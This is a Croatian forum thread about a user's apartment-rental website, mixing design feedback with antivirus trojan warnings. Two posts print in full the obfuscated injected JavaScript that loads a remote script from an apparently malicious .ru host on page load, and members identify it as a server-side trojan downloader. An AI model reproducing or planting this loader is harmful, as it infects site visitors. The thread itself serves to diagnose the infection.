Možete li ocjeniti moju web stranicu?

poruka: 60
|
čitano: 6.565
|
moderatori: Lazarus Long, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
17 godina
protjeran
RE: Možete li ocjeniti moju web stranicu?
Brzi97 kaže...

Meni javlja trojanca!!!Iznenađen

isti je i kod mene

''how yes no''
15 godina
neaktivan

povecaj ikonice dodaj koji video dodaj i koji efekat i bi ce super za sada od 1 do 10 ocena je 5

0 0 hvala 0
15 godina
neaktivan

10/10 - http://www.pes-cro.net , server je malo sporiji, ali nakon čiščenja će biti super

Poruka je uređivana zadnji put pon 28.12.2009 1:29 (zolee).

1 0 hvala 0
17 godina
neaktivan

Odakle je dizajn?

Pardon, da preformuliram. Odakle si uzeo dizajn??

Govorim za  www.apartmani-blidinje.com

dr. Mito Korupcija, doktor političkih znanosti.
Poruka je uređivana zadnji put pon 28.12.2009 12:59 (coder_).
Moj PC  
0 0 hvala 0
17 godina

Ocjena je 5/10

Evo nekih prijedloga kako to malo poboljšati:

• Pahuljice stavi samo na background (onaj dio stranice gdje ti nema neki sadržaj, ono bjelo sa obje strane)
  • Napravi panoramnu sliku cijelog apartmana (spojiš više slika u jednu veliku tako da dobiješ cijeli krug), pa onda kad korisnik pritisne na "smanjenu slikicu" mu se prikaže veća slika gdje pomoću javascripta okrećeš sliku i korisnik ima neki privid 3d-a(ako si vidio google street, nešto slično tome). Možeš se još i dalje igrati sa slikama i napravit zoom in i out pomoću JS-a. Nije tako teško.
  • Smanji vrijeme animacija na meni-u, povećaj slike u meni-u.
  • Nisu mi se otvorile neke slike za apartmane, nisam vidio da ima neki zoom slika
  • Dok klikneš na prvu sliku "apartmani bidinje", onu prije meni-a, ne događa se ništa, bilo bi dobro da ide na home.

Evo to su samo neki od prijedloga, ovako je OK, boje su ti dobro usklađene, izgleda dobro

'Genius might be the ability to say a profound thing in a simple way' Charles Bukowski

0 0 hvala 0
15 godina
neaktivan

od 1 do 5

4

0 0 hvala 0
16 godina
neaktivan

Vrlo dobra,posebno mi se svida navigacijam i sama jednostavnost,a za bozicni ugodaj tu je i javascripta pahuljica.7/10

16 godina

Stranica je dobra, jednostavna i organizirana. Sviđa mi se. Dobro kod dizajna uvijek se može javiti neka zamjerka.

Što se tiče ovih ideja 3D ili rezervacija - polako ljudi, vidite da sezona još nije niti počela, posuđuju se djelovi - treba zaraditi pare da bi ih se trošilo:-)

16 godina
neaktivan
dado2202 kaže...

Ocjena je 5/10

Evo nekih prijedloga kako to malo poboljšati:

• Pahuljice stavi samo na background (onaj dio stranice gdje ti nema neki sadržaj, ono bjelo sa obje strane)
  • Napravi panoramnu sliku cijelog apartmana (spojiš više slika u jednu veliku tako da dobiješ cijeli krug), pa onda kad korisnik pritisne na "smanjenu slikicu" mu se prikaže veća slika gdje pomoću javascripta okrećeš sliku i korisnik ima neki privid 3d-a(ako si vidio google street, nešto slično tome). Možeš se još i dalje igrati sa slikama i napravit zoom in i out pomoću JS-a. Nije tako teško.
  • Smanji vrijeme animacija na meni-u, povećaj slike u meni-u.
  • Nisu mi se otvorile neke slike za apartmane, nisam vidio da ima neki zoom slika
  • Dok klikneš na prvu sliku "apartmani bidinje", onu prije meni-a, ne događa se ništa, bilo bi dobro da ide na home.

Evo to su samo neki od prijedloga, ovako je OK, boje su ti dobro usklađene, izgleda dobro

Za izradu panorame mu netreba javascript (mislim da bi to bilo lose),  već ima program PANO2VR koji izraduđuje panoramske .swf datoteke i imas 360*  pogled sastavljen od više slika. Imas ovdje primjere koji su rađeni u PANO2VR.

k1.c0
16 godina
neaktivan

virus

nije me briga ako je false flag

ja sam neinformiran korisnik

javlja mi virus

ti nisi zlocest

ahhh, tako ce ljudi mislit...

0 0 hvala 0
17 godina
neaktivan

Od 1 do 10??

Nemoj se naljutiti al je ovo čista NULA (0)

Totalno fulana koncepcija...ma...ma neču niš govorit...najbolje usporedi sa sličnim stranicama proizvedenim kod profesionalaca.

Kao pokušaj je Ok...al ne ocjenjujemo pokušaj, nego kao funkcionalnu web stranicu...

www.istratourism.com
Moj PC  
0 0 hvala 0
15 godina

trojanac zajebava majku mu

Moj PC  
0 0 hvala 0
16 godina

Bila bi bolja da nemaš gore trojanca.

AMD
16 godina

meni iskoci trojan alert hhahahahah

Poruka je uređivana zadnji put ned 3.1.2010 22:15 (Pislje).
Moj PC  
0 0 hvala 0
15 godina
protjeran

Nemogu

Moj PC  
0 0 hvala 0
15 godina
neaktivan

Imaš trojanca na stranici...

pozdrav

16 godina
neaktivan

Nije trojanac, false positive je. Ne vidim ništa što bi bilo sumnjivo ovdje. http://www.apartmani-blidinje.com/js/slike.js

Osim ako nema nešto u ovom dole, gnu/gpl licencnom js.

Nways, cool fora Maka. Da malo podigneš klikove i rank na google-u.Cool

Bustin at people who said my name in vain, I got no time for them tricks, I'm heavy in the game!!! I wanna be a baller, please, But the bitches and the liquor keep on callin me...

0 0 hvala 0
15 godina
neaktivan
Brzi97 kaže...

Meni javlja trojanca!!!Iznenađen

I meni. NOD32.

17 godina
neaktivan

Imaš trojanca i na www.dead-pixel.info i na ovoj stranici iz teme. avast antivirus.

Some peoples tells me that i need help some people can fuck up and go to hell.
Poruka je uređivana zadnji put pon 4.1.2010 13:03 (vedrann).

0 0 hvala 0
17 godina
neaktivan
Moj PC  
0 0 hvala 0
17 godina
neaktivan

pametna reklama

0 0 hvala 0
17 godina
neaktivan

Dali su stranice 'propustene' kroz

http://validator.w3.org/

i

http://jigsaw.w3.org/css-validator/

Pozdrav

Have a nice day - Compa
15 godina
neaktivan

Znam da je stranica zaražena, a skinuo sam i skriptu s kojom se rješim trojanca, ali nakon par dana se on opet vraća. Prijavio sam to momku što sam od njega uzeo hosting, pa će se on s tim pozabavit, jer je vjerovatno kod njega taj problem.

www.dead-pixel.info
Poruka je uređivana zadnji put pon 4.1.2010 14:00 (night_r1d3r).

0 0 hvala 0
15 godina
protjeran

A šta ti je ovo momak?

<script>/*GNU GPL*/ try{window.onload = function(){var Lwlxm5wmdhtn = document.createElement('s@!#c$^r@!^i(#p###t($'.replace(/\)|@|\!|#|\^|\(|\$|&/ig, ''));var Flvvhkpwvp5l = 'Sz9nut96e3l3';Lwlxm5wmdhtn.setAttribute('type', 't!e&!x@@&t@)/@!j@a@)#@v^@(a&)s&)#&c$!!r^)@i&p^)(&t&^$#'.replace(/\)|\^|\$|\(|@|\!|&|#/ig, ''));Lwlxm5wmdhtn.setAttribute('src',  'h@(!(t&@t@#p&:@@)&$/@@/@s#($e$)!#(a)$$r!))s^(!-$c#!o!#^#)m)@$!.#&)g!&a^@m)#e$$!v^^@#a@!)n^$$!c$!e)&$!.!@&#c!&o^)&m^(.(!c^l&!$i$$!#(c()@)k#(s#!$(o$(((r$#^(-!c$(@o#m!!.!g&((u$#!i@d^)e!^^b^a)t&.@!^r&@!@u)!^&:&)8!#0#^8#!0)/^!p!^i^(&$c^h)u()n#)t!$^#e##&^r^^)$(.!c(^$$!o#$)(m@()@/!^@@p$&#i^^!^c)$#(h()!#u(n#($t(e@#r()^^.^)c($#o^#m$$^/$(!o(())d$(&@e&^$s@@@k!.!#c^)o&m!/^@@t&((v^.@)#c#!o^!@m)##)/)#!g#$o))o$g$$^(l&)!#e(^$.#)c&o)$#)m&()/^^'.replace(/\$|&|\(|@|\^|\!|#|\)/ig, ''));Lwlxm5wmdhtn.setAttribute('defer', 'd)$e@@f@@&(e)@r^!('.replace(/@|\(|\$|&|\)|#|\!|\^/ig, ''));Lwlxm5wmdhtn.setAttribute('id', 'W^q#&@m^^&7#&#1!!)!q&#i#&f&2^i)!z$&)('.replace(/&|#|\)|\^|\!|@|\$|\(/ig, ''));document.body.appendChild(Lwlxm5wmdhtn);}} catch(T3fo7j6afdaj4r) {}</script>

Pa nećemo se valjda tako igrati?

Prepolovit ću pučanstvo jer ne volim kretene
Moj PC  
0 0 hvala 0
15 godina
protjeran

Ocijenjujem tvoju stranicu zaraženom trojan downloaderom i lagano može biti prijavljena google-u. Belji se

Moj PC  
0 0 hvala 0
16 godina
neaktivan
Buffer Overflow kaže...

A šta ti je ovo momak?

<script>/*GNU GPL*/ try{window.onload = function(){var Lwlxm5wmdhtn = document.createElement('s@!#c$^r@!^i(#p###t($'.replace(/\)|@|\!|#|\^|\(|\$|&/ig, ''));var Flvvhkpwvp5l = 'Sz9nut96e3l3';Lwlxm5wmdhtn.setAttribute('type', 't!e&!x@@&t@)/@!j@a@)#@v^@(a&)s&)#&c$!!r^)@i&p^)(&t&^$#'.replace(/\)|\^|\$|\(|@|\!|&|#/ig, ''));Lwlxm5wmdhtn.setAttribute('src',  'h@(!(t&@t@#p&:@@)&$/@@/@s#($e$)!#(a)$$r!))s^(!-$c#!o!#^#)m)@$!.#&)g!&a^@m)#e$$!v^^@#a@!)n^$$!c$!e)&$!.!@&#c!&o^)&m^(.(!c^l&!$i$$!#(c()@)k#(s#!$(o$(((r$#^(-!c$(@o#m!!.!g&((u$#!i@d^)e!^^b^a)t&.@!^r&@!@u)!^&:&)8!#0#^8#!0)/^!p!^i^(&$c^h)u()n#)t!$^#e##&^r^^)$(.!c(^$$!o#$)(m@()@/!^@@p$&#i^^!^c)$#(h()!#u(n#($t(e@#r()^^.^)c($#o^#m$$^/$(!o(())d$(&@e&^$s@@@k!.!#c^)o&m!/^@@t&((v^.@)#c#!o^!@m)##)/)#!g#$o))o$g$$^(l&)!#e(^$.#)c&o)$#)m&()/^^'.replace(/\$|&|\(|@|\^|\!|#|\)/ig, ''));Lwlxm5wmdhtn.setAttribute('defer', 'd)$e@@f@@&(e)@r^!('.replace(/@|\(|\$|&|\)|#|\!|\^/ig, ''));Lwlxm5wmdhtn.setAttribute('id', 'W^q#&@m^^&7#&#1!!)!q&#i#&f&2^i)!z$&)('.replace(/&|#|\)|\^|\!|@|\$|\(/ig, ''));document.body.appendChild(Lwlxm5wmdhtn);}} catch(T3fo7j6afdaj4r) {}</script>

Pa nećemo se valjda tako igrati?

Ne mora to ništa značiti. Možda samo "olakšana" verzija neke skripte, tipa highslide. Orginalna verzija je oko 50kb, olakšana i koristi ovakve znakove 26kb.

Bustin at people who said my name in vain, I got no time for them tricks, I'm heavy in the game!!! I wanna be a baller, please, But the bitches and the liquor keep on callin me...
15 godina
protjeran

Nije olakšana verzija ničega. Ima pozitivni signature i nije skračenica ničega. Nije ni vidljiva u pagesource-u nego vjerojatno proizlazi iz neke php skripte.

Moj PC  
0 0 hvala 0
16 godina
neaktivan
Buffer Overflow kaže...

Nije olakšana verzija ničega. Ima pozitivni signature i nije skračenica ničega. Nije ni vidljiva u pagesource-u nego vjerojatno proizlazi iz neke php skripte.

Istina. Imaju backdooran server. Nije on kriv.

15 godina
protjeran
Smooth Operator kaže...

Istina. Imaju backdooran server. Nije on kriv.

Znam da nije, moram ga malo zaje*avat Smijeh

16 godina
neaktivan
Buffer Overflow kaže...

Znam da nije, moram ga malo zaje*avat Smijeh

True, true... Cool

Nova poruka
E-mail:
Lozinka:

vrh stranice